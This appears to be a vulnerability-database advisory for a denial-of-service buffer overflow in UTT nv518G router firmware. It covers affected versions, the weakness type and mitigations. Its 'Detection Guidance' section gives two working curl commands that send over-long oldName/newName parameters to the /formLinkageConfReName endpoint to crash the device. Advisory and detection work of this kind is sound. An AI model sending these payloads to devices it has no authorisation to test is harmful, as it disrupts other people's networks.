CVE-2026-52193
Deferred Deferred - Pending Action

Buffer Overflow in UTT nv518G nv518GV3 Firmware

Vulnerability report for CVE-2026-52193, including description, CVSS score, EPSS score, affected products, exploitability, helpful resources, and attack-flow context.

Publication date: 2026-06-30

Last updated on: 2026-07-01

Assigner: MITRE

Description

Buffer Overflow vulnerability in UTT nv518G nv518GV3v3.2.7-210919-161313 allows a remote attacker to cause a denial of service via the gohead/sub_447CAC component

CVSS Scores

EPSS Scores

Probability:
Percentile:

Meta Information

Published
2026-06-30
Last Modified
2026-07-01
Generated
2026-07-21
AI Q&A
2026-07-01
EPSS Evaluated
2026-07-19
NVD
EUVD

Affected Vendors & Products

Showing 2 associated CPEs
Vendor Product Version / Range
utt nv518g From 3.2.7 (exc)
utt nv518gv3 From 3.2.7 (exc)

Helpful Resources

Exploitability

CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-120 The product copies an input buffer to an output buffer without verifying that the size of the input buffer is less than the size of the output buffer.

Attack-Flow Graph

AI Quick Actions

Instant insights powered by AI
Executive Summary

This vulnerability is a buffer overflow in the UTT nv518G nv518GV3v3.2.7-210919-161313 device. It occurs in the gohead/sub_447CAC component and allows a remote attacker to cause a denial of service.

Detection Guidance

This vulnerability can be detected by sending crafted POST requests to the `/formLinkageConfReName` endpoint with excessively long `oldName` or `newName` parameters. If the system is vulnerable, these requests may cause a denial of service or unexpected behavior due to buffer overflow.

A detection command example using curl would be:

  • curl -X POST http://<target-ip>/formLinkageConfReName -d "oldName=$(python3 -c 'print("A"*50)')&newName=test&statustr=1"
  • curl -X POST http://<target-ip>/formLinkageConfReName -d "oldName=test&newName=$(python3 -c 'print("B"*50)')&statustr=1"

These commands send payloads with long strings (over 40 bytes) to trigger the buffer overflow condition. Monitoring the device for crashes or abnormal behavior after these requests can indicate the presence of the vulnerability.

Impact Analysis

The impact of this vulnerability is that a remote attacker can cause a denial of service on the affected device, potentially disrupting its normal operation.

Mitigation Strategies

Immediate mitigation steps include:

  • Avoid exposing the vulnerable endpoint `/formLinkageConfReName` to untrusted networks or the internet.
  • Apply any available firmware updates or patches from the vendor that address this buffer overflow vulnerability.
  • Implement network-level protections such as firewalls or intrusion prevention systems to block suspicious POST requests with unusually long parameters targeting this endpoint.
  • Monitor system logs and device behavior for signs of exploitation attempts or crashes.

Chat Assistant

Ask questions about this CVE
Hi! I’m here to help you understand CVE-2026-52193. Ask me anything about the vulnerability, its impact, or mitigation strategies.
0/70

EPSS Chart